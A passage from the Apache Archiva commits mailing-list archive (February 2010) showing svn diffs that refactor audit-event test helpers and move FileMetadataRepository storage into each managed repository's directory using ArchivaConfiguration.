expectedEvent.getName(), event3.getName() ) ); // only match the middle one metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name2 ), expectedEvent ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent.getName() ), + expectedEvent ); metadataRepositoryControl.replay(); @@ -302,22 +300,22 @@ { Date current = new Date(); - String name1 = createEventName( new Date( current.getTime() - 12345 ) ); + AuditEvent event1 = createEvent( new Date( current.getTime() - 12345 ) ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = createEventName( expectedTimestamp ); - AuditEvent expectedEvent2 = createTestEvent( name2 ); + AuditEvent expectedEvent2 = createEvent( expectedTimestamp ); Date ts3 = new Date( current.getTime() - 1000 ); - String name3 = createEventName( ts3 ); - AuditEvent expectedEvent3 = createTestEvent( name3 ); + AuditEvent expectedEvent3 = createEvent( ts3 ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), - Arrays.asList( name1, name2, name3 ) ); + Arrays.asList( event1.getName(), expectedEvent2.getName(), expectedEvent3.getName() ) ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name2 ), expectedEvent2 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent2.getName() ), + expectedEvent2 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name3 ), expectedEvent3 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent3.getName() ), + expectedEvent3 ); metadataRepositoryControl.replay(); @@ -337,21 +335,21 @@ Date current = new Date(); Date ts1 = new Date( current.getTime() - 12345 ); - String name1 = createEventName( ts1 ); - AuditEvent expectedEvent1 = createTestEvent( name1 ); + AuditEvent expectedEvent1 = createEvent( ts1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = createEventName( expectedTimestamp ); - AuditEvent expectedEvent2 = createTestEvent( name2 ); - String name3 = createEventName( new Date( current.getTime() - 1000 ) ); + AuditEvent expectedEvent2 = createEvent( expectedTimestamp ); + AuditEvent event3 = createEvent( new Date( current.getTime() - 1000 ) ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), - Arrays.asList( name1, name2, name3 ) ); + Arrays.asList( expectedEvent1.getName(), expectedEvent2.getName(), event3.getName() ) ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name1 ), expectedEvent1 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent1.getName() ), + expectedEvent1 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name2 ), expectedEvent2 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent2.getName() ), + expectedEvent2 ); metadataRepositoryControl.replay(); @@ -372,25 +370,25 @@ Date current = new Date(); Date ts1 = new Date( current.getTime() - 12345 ); - String name1 = createEventName( ts1 ); - AuditEvent expectedEvent1 = createTestEvent( name1 ); + AuditEvent expectedEvent1 = createEvent( ts1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = createEventName( expectedTimestamp ); - AuditEvent expectedEvent2 = createTestEvent( name2 ); + AuditEvent expectedEvent2 = createEvent( expectedTimestamp ); Date ts3 = new Date( current.getTime() - 1000 ); - String name3 = createEventName( ts3 ); - AuditEvent expectedEvent3 = createTestEvent( name3 ); + AuditEvent expectedEvent3 = createEvent( ts3 ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), - Arrays.asList( name1, name2, name3 ) ); + Arrays.asList( expectedEvent1.getName(), expectedEvent2.getName(), expectedEvent3.getName() ) ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name1 ), expectedEvent1 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent1.getName() ), + expectedEvent1 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name2 ), expectedEvent2 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent2.getName() ), + expectedEvent2 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name3 ), expectedEvent3 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent3.getName() ), + expectedEvent3 ); metadataRepositoryControl.replay(); @@ -411,26 +409,26 @@ Date current = new Date(); Date ts1 = new Date( current.getTime() - 12345 ); - String name1 = createEventName( ts1 ); - AuditEvent expectedEvent1 = createTestEvent( name1 ); + AuditEvent expectedEvent1 = createEvent( ts1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = createEventName( expectedTimestamp ); - AuditEvent expectedEvent2 = createTestEvent( name2 ); + AuditEvent expectedEvent2 = createEvent( expectedTimestamp ); expectedEvent2.setResource( "different-resource" ); Date ts3 = new Date( current.getTime() - 1000 ); - String name3 = createEventName( ts3 ); - AuditEvent expectedEvent3 = createTestEvent( name3 ); + AuditEvent expectedEvent3 = createEvent( ts3 ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), - Arrays.asList( name1, name2, name3 ) ); + Arrays.asList( expectedEvent1.getName(), expectedEvent2.getName(), expectedEvent3.getName() ) ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name1 ), expectedEvent1 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent1.getName() ), + expectedEvent1 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name2 ), expectedEvent2 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent2.getName() ), + expectedEvent2 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name3 ), expectedEvent3 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent3.getName() ), + expectedEvent3 ); metadataRepositoryControl.replay(); @@ -450,25 +448,25 @@ { Date current = new Date(); - String name1 = createEventName( new Date( current.getTime() - 12345 ) ); - AuditEvent expectedEvent1 = createTestEvent( name1 ); + AuditEvent expectedEvent1 = createEvent( new Date( current.getTime() - 12345 ) ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = createEventName( expectedTimestamp ); - AuditEvent expectedEvent2 = createTestEvent( name2 ); + AuditEvent expectedEvent2 = createEvent( expectedTimestamp ); expectedEvent2.setResource( "different-resource" ); - String name3 = createEventName( new Date( current.getTime() - 1000 ) ); - AuditEvent expectedEvent3 = createTestEvent( name3 ); + AuditEvent expectedEvent3 = createEvent( new Date( current.getTime() - 1000 ) ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), - Arrays.asList( name1, name2, name3 ) ); + Arrays.asList( expectedEvent1.getName(), expectedEvent2.getName(), expectedEvent3.getName() ) ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name1 ), expectedEvent1 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent1.getName() ), + expectedEvent1 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name2 ), expectedEvent2 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent2.getName() ), + expectedEvent2 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name3 ), expectedEvent3 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent3.getName() ), + expectedEvent3 ); metadataRepositoryControl.replay(); @@ -486,26 +484,29 @@ Date current = new Date(); Date ts1 = new Date( current.getTime() - 12345 ); - String name1 = createEventName( ts1 ); - AuditEvent expectedEvent1 = createTestEvent( TEST_REPO_ID, name1 ); + AuditEvent expectedEvent1 = createEvent( ts1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = createEventName( expectedTimestamp ); - AuditEvent expectedEvent2 = createTestEvent( TEST_REPO_ID_2, name2 ); + AuditEvent expectedEvent2 = createEvent( expectedTimestamp ); + expectedEvent2.setRepositoryId( TEST_REPO_ID_2 ); Date ts3 = new Date( current.getTime() - 1000 ); - String name3 = createEventName( ts3 ); - AuditEvent expectedEvent3 = createTestEvent( TEST_REPO_ID, name3 ); + AuditEvent expectedEvent3 = createEvent( ts3 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), Arrays.asList( name1, name3 ) ); + metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), + Arrays.asList( expectedEvent1.getName(), expectedEvent3.getName() ) ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacets( TEST_REPO_ID_2, AuditEvent.FACET_ID ), Arrays.asList( name2 ) ); + metadataRepository.getMetadataFacets( TEST_REPO_ID_2, AuditEvent.FACET_ID ), + Arrays.asList( expectedEvent2.getName() ) ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name1 ), expectedEvent1 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent1.getName() ), + expectedEvent1 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID_2, AuditEvent.FACET_ID, name2 ), expectedEvent2 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID_2, AuditEvent.FACET_ID, expectedEvent2.getName() ), + expectedEvent2 ); metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name3 ), expectedEvent3 ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, expectedEvent3.getName() ), + expectedEvent3 ); metadataRepositoryControl.replay(); @@ -526,10 +527,10 @@ { Date current = new Date(); - String name1 = createEventName( new Date( current.getTime() - 12345 ) ); + String name1 = createEvent( new Date( current.getTime() - 12345 ) ).getName(); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = createEventName( expectedTimestamp ); - String name3 = createEventName( new Date( current.getTime() - 1000 ) ); + String name2 = createEvent( expectedTimestamp ).getName(); + String name3 = createEvent( new Date( current.getTime() - 1000 ) ).getName(); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), @@ -551,24 +552,17 @@ return TEST_RESOURCE_BASE + "/" + num + ".xml"; } - private static String createEventName( Date timestamp ) - throws ParseException - { - // TODO: I think we can reverse the calls. - return createEvent( TEST_REPO_ID, TIMESTAMP_FORMAT.format( timestamp ), null ).getName(); - } - - private static AuditEvent createTestEvent( String name ) + private static AuditEvent createEvent( Date timestamp ) throws ParseException { - return createTestEvent( TEST_REPO_ID, name ); + return createEvent( TIMESTAMP_FORMAT.format( timestamp ) ); } - private static AuditEvent createTestEvent( String repoId, String name ) + private static AuditEvent createEvent( String ts ) throws ParseException { - return createEvent( repoId, name, getDefaultTestResourceName( - name.substring( AUDIT_EVENT_BASE.length(), AUDIT_EVENT_BASE.length() + 3 ) ) ); + return createEvent( TEST_REPO_ID, ts, getDefaultTestResourceName( + ts.substring( AUDIT_EVENT_BASE.length(), AUDIT_EVENT_BASE.length() + 3 ) ) ); } private static AuditEvent createEvent( String repositoryId, String timestamp, String resource ) @@ -598,4 +592,14 @@ assertEquals( TEST_USER, event.getUserId() ); assertEquals( resource, event.getResource() ); } + + private List<String> getEventNames( List<AuditEvent> events ) + { + List<String> names = new ArrayList<String>( events.size() ); + for ( AuditEvent event : events ) + { + names.add( event.getName() ); + } + return names; + } } \ No newline at end of file From [email protected] Tue Feb 16 12:44:38 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4194 invoked from network); 16 Feb 2010 12:44:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 12:44:37 -0000 Received: (qmail 62427 invoked by uid 500); 16 Feb 2010 12:44:37 -0000 Delivered-To: [email protected] Received: (qmail 62366 invoked by uid 500); 16 Feb 2010 12:44:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 62357 invoked by uid 99); 16 Feb 2010 12:44:37 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 12:44:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 12:44:34 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 149192388A1A; Tue, 16 Feb 2010 12:44:13 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910504 - in /archiva/branches/MRM-1025/archiva-modules: metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/ plugins/metadata-repository-file/ plugins/metadata-repository-file/src/main/java/org/apache/arch... Date: Tue, 16 Feb 2010 12:44:12 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Tue Feb 16 12:44:12 2010 New Revision: 910504 URL: http://svn.apache.org/viewvc?rev=910504&view=rev Log: [MRM-1282] move the content into the repository data directory Modified: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/MetadataRepository.java archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/pom.xml archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java Modified: archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/MetadataRepository.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/MetadataRepository.java?rev=910504&r1=910503&r2=910504&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/MetadataRepository.java (original) +++ archiva/branches/MRM-1025/archiva-modules/metadata/metadata-repository-api/src/main/java/org/apache/archiva/metadata/repository/MetadataRepository.java Tue Feb 16 12:44:12 2010 @@ -63,6 +63,7 @@ List<ArtifactMetadata> getArtifactsByDateRange( String repoId, Date startTime, Date endTime ); + // TODO: remove from API, just use configuration Collection<String> getRepositories(); List<ArtifactMetadata> getArtifactsByChecksum( String repoId, String checksum ); Modified: archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/pom.xml?rev=910504&r1=910503&r2=910504&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/pom.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/pom.xml Tue Feb 16 12:44:12 2010 @@ -30,6 +30,10 @@ <dependencies> <dependency> <groupId>org.apache.archiva</groupId> + <artifactId>archiva-configuration</artifactId> + </dependency> + <dependency> + <groupId>org.apache.archiva</groupId> <artifactId>metadata-repository-api</artifactId> </dependency> <dependency> Modified: archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java?rev=910504&r1=910503&r2=910504&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java Tue Feb 16 12:44:12 2010 @@ -27,7 +27,6 @@ import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; -import java.util.Collections; import java.util.Date; import java.util.HashMap; import java.util.HashSet; @@ -54,6 +53,7 @@ import org.apache.archiva.metadata.repository.MetadataRepository; import org.apache.commons.io.FileUtils; import org.apache.commons.io.IOUtils; +import org.apache.maven.archiva.configuration.ArchivaConfiguration; import org.slf4j.Logger; import org.slf4j.LoggerFactory; @@ -64,16 +64,14 @@ implements MetadataRepository { /** - * TODO: this isn't suitable for production use - * - * @plexus.configuration + * @plexus.requirement role="org.apache.archiva.metadata.model.MetadataFacetFactory" */ - private File directory = new File( System.getProperty( "user.home" ), ".archiva-metadata" ); + private Map<String, MetadataFacetFactory> metadataFacetFactories; /** - * @plexus.requirement role="org.apache.archiva.metadata.model.MetadataFacetFactory" + * @plexus.requirement */ - private Map<String, MetadataFacetFactory> metadataFacetFactories; + private ArchivaConfiguration configuration; private static final Logger log = LoggerFactory.getLogger( FileMetadataRepository.class ); @@ -85,6 +83,19 @@ private static final String METADATA_KEY = "metadata"; + private File getBaseDirectory( String repoId ) + { + // TODO: should be configurable, like the index + String basedir = configuration.getConfiguration().getManagedRepositoriesAsMap().get( repoId ).getLocation(); + File dir = new File( basedir, ".archiva" ); + return dir; + } + + private File getDirectory( String repoId ) + { + return new File( getBaseDirectory( repoId ), "content" ); + } + public void updateProject( String repoId, ProjectMetadata project ) { updateProject( repoId, project.getNamespace(), project.getId() ); @@ -97,7 +108,7 @@ try { - File namespaceDirectory = new File( this.directory, repoId + "/" + namespace ); + File namespaceDirectory = new File( getDirectory( repoId ), namespace ); Properties properties = new Properties(); properties.setProperty( "namespace", namespace ); properties.setProperty( "id", id ); @@ -116,7 +127,7 @@ updateProject( repoId, namespace, projectId ); File directory = - new File( this.directory, repoId + "/" + namespace + "/" + projectId + "/" + versionMetadata.getId() ); + new File( getDirectory( repoId ), namespace + "/" + projectId + "/" + versionMetadata.getId() ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); // remove properties that are not references or artifacts @@ -207,7 +218,7 @@ public void updateProjectReference( String repoId, String namespace, String projectId, String projectVersion, ProjectVersionReference reference ) { - File directory = new File( this.directory, repoId + "/" + namespace + "/" + projectId + "/" + projectVersion ); + File directory = new File( getDirectory( repoId ), namespace + "/" + projectId + "/" + projectVersion ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); int i = Integer.valueOf( properties.getProperty( "ref:lastReferenceNum", "-1" ) ) + 1; @@ -232,7 +243,7 @@ { try { - File namespaceDirectory = new File( this.directory, repoId + "/" + namespace ); + File namespaceDirectory = new File( getDirectory( repoId ), namespace ); Properties properties = new Properties(); properties.setProperty( "namespace", namespace ); writeProperties( properties, namespaceDirectory, NAMESPACE_METADATA_KEY ); @@ -395,7 +406,7 @@ { Map<String, ArtifactMetadata> artifacts = new HashMap<String, ArtifactMetadata>(); - File directory = new File( this.directory, repoId + "/" + namespace + "/" + projectId + "/" + projectVersion ); + File directory = new File( getDirectory( repoId ), namespace + "/" + projectId + "/" + projectVersion ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); @@ -452,8 +463,7 @@ public Collection<String> getRepositories() { - String[] repoIds = this.directory.list(); - return repoIds != null ? Arrays.asList( repoIds ) : Collections.<String>emptyList(); + return configuration.getConfiguration().getManagedRepositoriesAsMap().keySet(); } public List<ArtifactMetadata> getArtifactsByChecksum( String repositoryId, String checksum ) @@ -471,9 +481,9 @@ return artifacts; } - public void deleteArtifact( String repositoryId, String namespace, String project, String version, String id ) + public void deleteArtifact( String repoId, String namespace, String project, String version, String id ) { - File directory = new File( this.directory, repositoryId + "/" + namespace + "/" + project + "/" + version ); + File directory = new File( getDirectory( repoId ), namespace + "/" + project + "/" + version ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); @@ -497,11 +507,9 @@ public void deleteRepository( String repoId ) { - File directory = new File( this.directory, repoId ); - try { - FileUtils.deleteDirectory( directory ); + FileUtils.deleteDirectory( getDirectory( repoId ) ); } catch ( IOException e ) { @@ -533,9 +541,9 @@ } } - private File getMetadataDirectory( String repositoryId, String facetId ) + private File getMetadataDirectory( String repoId, String facetId ) { - return new File( this.directory, repositoryId + "/.meta/" + facetId ); + return new File( getBaseDirectory( repoId ), "facets/" + facetId ); } private String join( Collection<String> ids ) @@ -564,7 +572,7 @@ public void updateArtifact( String repoId, String namespace, String projectId, String projectVersion, ArtifactMetadata artifact ) { - File directory = new File( this.directory, repoId + "/" + namespace + "/" + projectId + "/" + projectVersion ); + File directory = new File( getDirectory( repoId ), namespace + "/" + projectId + "/" + projectVersion ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); @@ -631,7 +639,7 @@ public ProjectMetadata getProject( String repoId, String namespace, String projectId ) { - File directory = new File( this.directory, repoId + "/" + namespace + "/" + projectId ); + File directory = new File( getDirectory( repoId ), namespace + "/" + projectId ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); @@ -644,7 +652,7 @@ public ProjectVersionMetadata getProjectVersion( String repoId, String namespace, String projectId, String projectVersion ) { - File directory = new File( this.directory, repoId + "/" + namespace + "/" + projectId + "/" + projectVersion ); + File directory = new File( getDirectory( repoId ), namespace + "/" + projectId + "/" + projectVersion ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); String id = properties.getProperty( "id" ); @@ -809,7 +817,7 @@ public Collection<String> getArtifactVersions( String repoId, String namespace, String projectId, String projectVersion ) { - File directory = new File( this.directory, repoId + "/" + namespace + "/" + projectId + "/" + projectVersion ); + File directory = new File( getDirectory( repoId ), namespace + "/" + projectId + "/" + projectVersion ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); @@ -828,7 +836,7 @@ public Collection<ProjectVersionReference> getProjectReferences( String repoId, String namespace, String projectId, String projectVersion ) { - File directory = new File( this.directory, repoId + "/" + namespace + "/" + projectId + "/" + projectVersion ); + File directory = new File( getDirectory( repoId ), namespace + "/" + projectId + "/" + projectVersion ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); int numberOfRefs = Integer.valueOf( properties.getProperty( "ref:lastReferenceNum", "-1" ) ) + 1; @@ -855,7 +863,7 @@ public Collection<String> getNamespaces( String repoId, String baseNamespace ) { List<String> allNamespaces = new ArrayList<String>(); - File directory = new File( this.directory, repoId ); + File directory = getDirectory( repoId ); File[] files = directory.listFiles(); if ( files != null ) { @@ -891,7 +899,7 @@ public Collection<String> getProjects( String repoId, String namespace ) { List<String> projects = new ArrayList<String>(); - File directory = new File( this.directory, repoId + "/" + namespace ); + File directory = new File( getDirectory( repoId ), namespace ); File[] files = directory.listFiles(); if ( files != null ) { @@ -909,7 +917,7 @@ public Collection<String> getProjectVersions( String repoId, String namespace, String projectId ) { List<String> projectVersions = new ArrayList<String>(); - File directory = new File( this.directory, repoId + "/" + namespace + "/" + projectId ); + File directory = new File( getDirectory( repoId ), namespace + "/" + projectId ); File[] files = directory.listFiles(); if ( files != null ) { @@ -939,13 +947,13 @@ } } - public void setDirectory( File directory ) + public void setMetadataFacetFactories( Map<String, MetadataFacetFactory> metadataFacetFactories ) { - this.directory = directory; + this.metadataFacetFactories = metadataFacetFactories; } - public void setMetadataFacetFactories( Map<String, MetadataFacetFactory> metadataFacetFactories ) + public void setConfiguration( ArchivaConfiguration configuration ) { - this.metadataFacetFactories = metadataFacetFactories; + this.configuration = configuration; } } Modified: archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java?rev=910504&r1=910503&r2=910504&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/test/java/org/apache/archiva/metadata/repository/file/FileMetadataRepositoryTest.java Tue Feb 16 12:44:12 2010 @@ -37,7 +37,11 @@ import org.apache.archiva.metadata.model.ProjectMetadata; import org.apache.archiva.metadata.model.ProjectVersionMetadata; import org.apache.commons.io.FileUtils; +import org.apache.maven.archiva.configuration.ArchivaConfiguration; +import org.apache.maven.archiva.configuration.Configuration; +import org.apache.maven.archiva.configuration.ManagedRepositoryConfiguration; import org.codehaus.plexus.spring.PlexusInSpringTestCase; +import org.easymock.MockControl; /** * @todo should this be a generic MetadataRepository implementation test? @@ -77,9 +81,17 @@ super.setUp(); repository = new FileMetadataRepository(); - File directory = getTestFile( "target/test-repository" ); + File directory = getTestFile( "target/test-repositories" ); FileUtils.deleteDirectory( directory ); - repository.setDirectory( directory ); + + MockControl control = MockControl.createControl( ArchivaConfiguration.class ); + ArchivaConfiguration config = (ArchivaConfiguration) control.getMock(); + Configuration configData = new Configuration(); + configData.addManagedRepository( createManagedRepository( TEST_REPO_ID, directory ) ); + configData.addManagedRepository( createManagedRepository( OTHER_REPO, directory ) ); + control.expectAndDefaultReturn( config.getConfiguration(), configData ); + control.replay(); + repository.setConfiguration( config ); Map<String, MetadataFacetFactory> factories = new HashMap<String, MetadataFacetFactory>(); factories.put( TEST_FACET_ID, new MetadataFacetFactory() @@ -111,6 +123,14 @@ repository.setMetadataFacetFactories( factories ); } + private static ManagedRepositoryConfiguration createManagedRepository( String repoId, File directory ) + { + ManagedRepositoryConfiguration managedRepository = new ManagedRepositoryConfiguration(); + managedRepository.setId( repoId ); + managedRepository.setLocation( new File( directory, repoId ).getAbsolutePath() ); + return managedRepository; + } + public void testRootNamespaceWithNoMetadataRepository() { Collection<String> namespaces = repository.getRootNamespaces( TEST_REPO_ID ); @@ -330,19 +350,6 @@ TEST_PROJECT_VERSION ) ); } - public void testRepositories() - { - repository.addMetadataFacet( TEST_REPO_ID, new TestMetadataFacet( TEST_VALUE ) ); - repository.addMetadataFacet( OTHER_REPO, new TestMetadataFacet( TEST_VALUE ) ); - - assertEquals( Arrays.asList( OTHER_REPO, TEST_REPO_ID ), repository.getRepositories() ); - } - - public void testRepositoriesWhenEmpty() - { - assertTrue( repository.getRepositories().isEmpty() ); - } - public void testGetArtifactsByDateRangeOpen() { repository.updateNamespace( TEST_REPO_ID, TEST_NAMESPACE ); From [email protected] Tue Feb 16 14:30:49 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56144 invoked from network); 16 Feb 2010 14:30:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 14:30:49 -0000 Received: (qmail 7944 invoked by uid 500); 16 Feb 2010 14:30:49 -0000 Delivered-To: [email protected] Received: (qmail 7883 invoked by uid 500); 16 Feb 2010 14:30:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7874 invoked by uid 99); 16 Feb 2010 14:30:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 14:30:49 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 14:30:48 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0E5D92388996; Tue, 16 Feb 2010 14:30:28 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910535 - in 